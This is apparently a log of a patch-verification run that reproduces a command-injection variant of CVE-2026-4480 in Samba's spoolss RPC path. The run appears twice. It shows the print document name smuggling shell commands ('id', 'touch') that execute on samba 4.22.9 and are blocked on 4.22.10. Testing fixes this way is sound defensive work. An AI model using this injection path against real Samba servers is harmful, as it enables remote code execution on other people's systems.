[22:01:45] === CVE-2026-4480 VARIANT REPRODUCTION STARTED === [22:01:45] Variant: spoolss RPC StartDocPrinter(pDocName) -> %J injection [22:01:45] Vulnerable: samba-4.22.9 (sha ff3dd691f38e23f9ea8d18376df1b24ea9b335b6) Fixed: samba-4.22.10 (sha 0abfaceda097f447ac0284db9f639dabc5070595) [22:01:45] Vulnerable smbd: Version 4.22.9 [22:01:45] Fixed smbd: Version 4.22.10 [22:01:45] ========== VULNERABLE TEST (samba-4.22.9) ========== [22:01:45] Starting smbd on port 14445... [22:01:50] smbd is listening on port 14445 [22:01:50] [VULN] Running spoolss RPC exploit on port 14445... [22:01:56] [VULN] Evidence: id_output=yes marker=yes [22:01:56] [VULN] Printlog: [22:01:56] [VULN] PWN [22:01:56] [VULN] uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) [22:01:56] [VULN] sh: 1: END: not found [22:01:58] smbd stopped [22:01:58] ========== FIXED TEST (samba-4.22.10) ========== [22:01:58] Starting smbd on port 14446... [22:02:03] smbd is listening on port 14446 [22:02:03] [FIXED] Running spoolss RPC exploit on port 14446... [22:02:09] [FIXED] Evidence: id_output=no marker=no [22:02:09] [FIXED] Printlog: [22:02:09] [FIXED] PWN__id__touch spoolss_marker__END [22:02:11] smbd stopped [22:02:11] ========== VARIANT VERDICT ========== [22:02:11] Vulnerable (spoolss path): id_output=yes marker=yes (expect yes for variant trigger) [22:02:11] Fixed (spoolss path): id_output=no marker=no (expect no if fix covers it) [22:02:11] RESULT: Variant CONFIRMED on vulnerable version (spoolss RPC path triggers RCE) [22:02:11] RESULT: Fix covers the variant (blocked on fixed version) - alternate trigger, NOT a bypass [22:02:11] variant_triggered=true bypass=false [22:02:11] === CVE-2026-4480 VARIANT REPRODUCTION FINISHED === [22:02:13] === CVE-2026-4480 VARIANT REPRODUCTION STARTED === [22:02:13] Variant: spoolss RPC StartDocPrinter(pDocName) -> %J injection [22:02:13] Vulnerable: samba-4.22.9 (sha ff3dd691f38e23f9ea8d18376df1b24ea9b335b6) Fixed: samba-4.22.10 (sha 0abfaceda097f447ac0284db9f639dabc5070595) [22:02:13] Vulnerable smbd: Version 4.22.9 [22:02:13] Fixed smbd: Version 4.22.10 [22:02:13] ========== VULNERABLE TEST (samba-4.22.9) ========== [22:02:13] Starting smbd on port 14445... [22:02:18] smbd is listening on port 14445 [22:02:18] [VULN] Running spoolss RPC exploit on port 14445... [22:02:24] [VULN] Evidence: id_output=yes marker=yes [22:02:24] [VULN] Printlog: [22:02:24] [VULN] PWN [22:02:24] [VULN] uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) [22:02:24] [VULN] sh: 1: END: not found [22:02:26] smbd stopped [22:02:26] ========== FIXED TEST (samba-4.22.10) ========== [22:02:26] Starting smbd on port 14446... [22:02:31] smbd is listening on port 14446 [22:02:31] [FIXED] Running spoolss RPC exploit on port 14446... [22:02:37] [FIXED] Evidence: id_output=no marker=no [22:02:37] [FIXED] Printlog: [22:02:37] [FIXED] PWN__id__touch spoolss_marker__END [22:02:39] smbd stopped [22:02:39] ========== VARIANT VERDICT ========== [22:02:39] Vulnerable (spoolss path): id_output=yes marker=yes (expect yes for variant trigger) [22:02:39] Fixed (spoolss path): id_output=no marker=no (expect no if fix covers it) [22:02:39] RESULT: Variant CONFIRMED on vulnerable version (spoolss RPC path triggers RCE) [22:02:39] RESULT: Fix covers the variant (blocked on fixed version) - alternate trigger, NOT a bypass [22:02:39] variant_triggered=true bypass=false [22:02:39] === CVE-2026-4480 VARIANT REPRODUCTION FINISHED ===